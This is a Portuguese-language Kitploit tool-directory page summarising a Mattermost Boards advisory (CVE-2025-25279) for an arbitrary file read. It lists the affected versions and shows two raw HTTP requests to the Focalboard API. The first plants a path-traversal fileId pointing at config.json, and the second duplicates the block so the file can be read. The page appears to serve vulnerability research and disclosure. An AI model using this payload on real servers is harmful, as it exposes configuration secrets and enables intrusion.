Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-25279 | Kitploit
Ferramentas/GitHubGitHub/numanturle/cve-2025-25279
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebExfiltração de DadosColeta de InformaçõesConfiguração Incorreta
GitHubnumanturle/cve-2025-25279

CVE-2025-25279

Ver Repositório
42há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Aviso de Segurança MMSA-2025-00430 / CVE-2025-25279

Resumo

Após enviar um arquivo para o Mattermost Boards, quando o parâmetro fileId é modificado e o board é copiado, o arquivo passa a apontar para o arquivo de destino especificado no parâmetro e a baixá-lo.

Versões Afetadas: Instâncias do Mattermost com Boards habilitado CVE: CVE-2025-25279

Descrição

As versões 10.4.x <= 10.4.1, 9.11.x <= 9.11.7, 10.3.x <= 10.3.2, 10.2.x <= 10.2.2 do Mattermost não validam corretamente os blocos do board ao importar boards, o que permite que um atacante leia qualquer arquivo arbitrário do sistema por meio da importação e exportação de um arquivo de importação especialmente criado no Boards.

Capturas de Tela

Screenshot 1 Screenshot 2 Screenshot 3 Screenshot 4

root@kitploit:~
POST /plugins/focalboard/api/v2/boards/bqgcxem5wo3ncfxkbfn5rkawxcr/blocks HTTP/1.1
Host: localhost:8065
Content-Length: 403
Authorization: 
Accept-Language: en-US,en;q=0.9
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0
Accept: application/json
Content-Type: application/json
Origin: http://localhost:8065
Connection: keep-alive

[{"id":"7gni7t3q3gj6unkq49mpb3xzdre","schema":1,"boardId":"bqgcxem5wo3ncfxkbfn5rkawxcr","parentId":"crc1qdykm1pg4mbfpct45qnyorw","createdBy":"","modifiedBy":"","type":"attachment","fields":{"fileId":"../../../../../../../mattermost/config/config.json"},"title":"CVE-2025-25279.txt","createAt":1740423098470,"updateAt":1740423098470,"deleteAt":0,"limited":false,"isUploading":false,"uploadingPercent":0}]
root@kitploit:~
POST /plugins/focalboard/api/v2/boards/bqgcxem5wo3ncfxkbfn5rkawxcr/blocks/crc1qdykm1pg4mbfpct45qnyorw/duplicate?asTemplate=false HTTP/1.1
Host: localhost:8065
Content-Length: 0
Authorization: 
Accept-Language: en-US,en;q=0.9
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 
Accept: application/json
Content-Type: application/json
Origin: http://localhost:8065
Connection: keep-alive


Referências

  • Mattermost Security Updates
  • CWE-200: Information Exposure
  • CVE-2025-25279

O crédito não é meu, inclui revisão

Baixar ferramenta